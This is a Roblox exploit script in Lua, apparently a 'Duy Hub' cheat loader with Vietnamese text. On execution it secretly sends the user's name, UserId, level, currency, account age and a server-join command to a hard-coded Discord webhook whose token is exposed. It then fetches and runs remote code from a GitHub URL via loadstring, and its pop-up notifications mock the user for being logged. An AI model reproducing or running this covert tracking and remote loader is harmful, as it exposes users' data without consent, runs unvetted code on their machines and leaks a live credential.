HttpService = game:GetService("HttpService") 
 Webhook_URL =  "https://discord.com/api/webhooks/1269190586771177575/Lzks4rnyuvD3TBoARaoJ6AKIl_yOS7ncg6aXaBvq4EwNV_TZOKOBRRCu_eqaW2rQ7Z8P" 
local httprequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
httprequest(
 { 
 Url = Webhook_URL, 
 Method = 'POST', 
 Headers = { 
 ['Content-Type'] = 'application/json' 
 }, 
 Body = HttpService:JSONEncode({ 
 ["content"] = "", 
 ["embeds"] = {{ 
 ["author"] = { 
 ["name"] = " | "..game.Players.LocalPlayer.Name, 
 ["icon"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=100&height=100&format=png" 
 }, 
 ["title"] = ""..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
 ["description"] = "Goz Thấy ["..game.Players.LocalPlayer.DisplayName.."] Vừa Dùng Hack | Kick", 
 ["type"] = "rich", 
 ["color"] = tonumber(0xffffff), 
 ["fields"] = { 
 { 
 ["name"] = "Script Server:", 
 ["value"] = "```game:GetService('TeleportService'):TeleportToPlaceInstance(game.PlaceId,'"..game.JobId.."',game.Players.LocalPlayer)```", 
 ["inline"] = true }, 
 { 
 ["name"] = "UserId:", 
 ["value"] = "```"..game:GetService("Players").LocalPlayer.UserId.."```", 
 ["inline"] = true }, 
 { 
 ["name"] = "Level: ", 
 ["value"] = "```"..game.Players.LocalPlayer.Data.Levels.Value.."```", 
 ["inline"] = true }, 
 { 
["name"] = "Beli: ", 
 ["value"] = "```"..game.Players.LocalPlayer.Data.Belis.Value.."```", 
 ["inline"] = true }, 
 { 
 ["name"] = "Số tuổi của Account:", 
 ["value"] = game:GetService("Players").LocalPlayer.AccountAge, 
 ["inline"] = true },
{
["name"] = "",
["value"] = os.date(),
["inline"] = true }
 } 
 }} 
 }) 
 })
loadstring(game:HttpGet("https://raw.githubusercontent.com/DuyM7/Function-FindFirstChild-Plr/main/blacklist"))()
if test then
test:Destroy()
else
game.StarterGui:SetCore("SendNotification", {
                 Title = "Ngu", 
                 Text = " vào webhook admin r | admin đã xem và đánh rắm",
                 Icon = Anh_Gai_Alimi[math.random(1,#Anh_Gai_Alimi)], 
                 Duration = 2
             })  
game:GetService("Players").PlayerAdded:Connect(function(Player)
             game.StarterGui:SetCore("SendNotification", { 
                 Title = "thk này vào sv", 
                 Text = "🟢 "..Player.Name.." | LV: "..Player.Data.Levels.Value.." Đã Vào Server",
                 Icon = "https://www.roblox.com/headshot-thumbnail/image?userId="..Player.UserId.."&width=100&height=100&format=png",
                 Duration = 3
             }) 
end)
game:GetService("Players").PlayerRemoving:Connect(function(Player)
             game.StarterGui:SetCore("SendNotification", { 
                 Title = "Duy Hub", 
                 Text = "🔴 "..Player.Name.." | LV: "..Player.Data.Levels.Value.." Đã Rời Server",
                 Icon = "https://www.roblox.com/headshot-thumbnail/image?userId="..Player.UserId.."&width=100&height=100&format=png",
                 Duration = 3
             }) 
end)
end
